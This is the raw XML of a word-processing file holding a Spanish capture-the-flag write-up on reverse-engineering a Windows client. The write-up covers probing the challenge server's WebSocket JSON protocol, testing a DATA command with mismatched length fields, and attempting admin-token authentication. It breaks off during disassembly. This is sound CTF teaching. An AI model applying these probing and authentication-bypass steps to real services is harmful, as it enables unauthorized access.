        <w:t>Un cliente. Un servidor. Un heap que nadie auditó. El sistema sabe cuando lo observan. Demuestra que eres humano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El reto proporcionaba un ejecutable llamado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DataMasAlla.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y un servicio accesible mediante TCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El objetivo consistía en analizar el funcionamiento del cliente, comprender su protocolo de comunicación y conseguir la flag protegida por el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Aunque la descripción sugería una posible vulnerabilidad de heap y mecanismos antidepuración, la solución demostrada terminó utilizando ingeniería inversa del mecanismo de autenticación administrativa, sin necesidad de explotar el heap.</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2. Reconocimiento inicial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La primera conexión se realizó mediante:</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nc -v 34.135.253.132 36154</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor aceptó la conexión, pero no mostró ningún banner ni respondió a comandos de texto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Posteriormente, se identificó el archivo descargado:</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file DataMasAlla.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Resultado:</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PE32+ executable for MS Windows 5.02 (GUI),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>x86-64 (stripped to external PDB), 10 sections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Se trataba de un ejecutable de Windows de 64 bits, por lo que se inició un análisis estático en lugar de ejecutarlo directamente en Fedora.</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3. Análisis de cadenas del ejecutable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se utilizó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> para identificar mensajes, comandos y datos relevantes:</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strings -a -n 4 DataMasAlla.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Entre los hallazgos destacaron:</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{"type":"PUBLIC_INFO"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{"type":"HELLO","version":"1.3.3.7",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"client_id":"deadbeef-cafe-1337-b00b-c0ffee001337",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"client_ptr":"0x%llx"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{"type":"DATA","payload_size":%u,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"data_len":%u,"data":"%s"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{"type":"ADMIN_CMD","token":"%s","cmd":"get_flag"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">También se encontraron cadenas relacionadas con depuración y memoria, entre ellas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>IsDebuggerPresent</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>x64dbg.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>InfernoAlloc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La presencia de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ADMIN_CMD</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>get_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> reveló una posible vía para obtener directamente el secreto.</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4. Identificación del protocolo WebSocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Al revisar los bytes próximos a las cadenas de comunicación, se encontró una solicitud HTTP con negociación WebSocket:</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GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host: %s:%d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Upgrade: websocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Connection: Upgrade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Version: 13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esto explicó por qué el servidor había cerrado una conexión anterior en la que se envió JSON directamente sobre TCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El flujo correcto de comunicación era:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Conexión TCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Negociación WebSocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>HELLO → HELLO_ACK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Obtención del Session ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cálculo del token administrativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ADMIN_CMD → FLAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Con la biblioteca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>websocket-client</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> se consiguió establecer la comunicación correctamente:</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import websocketws = websocket.create_connection(    "ws://34.135.253.132:36154/",    timeout=8)</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5. Descubrimiento de una flag falsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Durante el reconocimiento se envió:</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{"type":"PUBLIC_INFO"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor respondió con información pública y una supuesta flag:</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"type": "PUBLIC_INFO_ACK",</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"version": "1.3.3.7",</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"flag": "CTF{th1s_1s_n0t_th3_r34l_fl4g_k33p_d1gg1ng}",</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"status": "operational"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El contenido indicaba expresamente que no era la flag real y que debíamos continuar investigando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Por tanto, se descartó como objetivo final.</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6. Investigación del heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se analizaron los parámetros </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>payload_size</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>data_len</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> del comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En una prueba se enviaron:</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"type": "DATA",</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"payload_size": 8,</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"data_len": 64,</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"data": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor respondió:</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"type": "DATA_ACK",</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"status": "SUCCESS",</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"bytes_processed": 64,</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"checksum_verified": true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor aceptó que la longitud declarada de los datos fuera superior al tamaño indicado del payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Este comportamiento era sospechoso y compatible con una posible validación insuficiente. Sin embargo, no se demostró una corrupción de memoria ni se utilizó una vulnerabilidad de heap en la explotación final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La investigación continuó por la vía del comando administrativo.</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7. Análisis de la autenticación administrativa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Inicialmente se probó el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ADMIN_CMD</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> utilizando una cadena encontrada en el ejecutable:</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"type": "ADMIN_CMD",</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"token": "admin_token_2024_dev",</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"cmd": "get_flag"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor respondió:</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"type": "ERROR",</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"code": 403,</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"msg": "Token inválido",</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"expected_length": 16,</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"received_length": 20,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>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"hint": "El token se deriva de datos de la sesión"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esta respuesta reveló dos condiciones fundamentales: el token debía tener 16 caracteres y se derivaba de datos de la sesión actual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Posteriormente, el análisis del código permitió identificar una función que construía el mensaje administrativo:</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140005953: push rsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>140005954: push rbx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>140005955: sub  rsp,0x128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
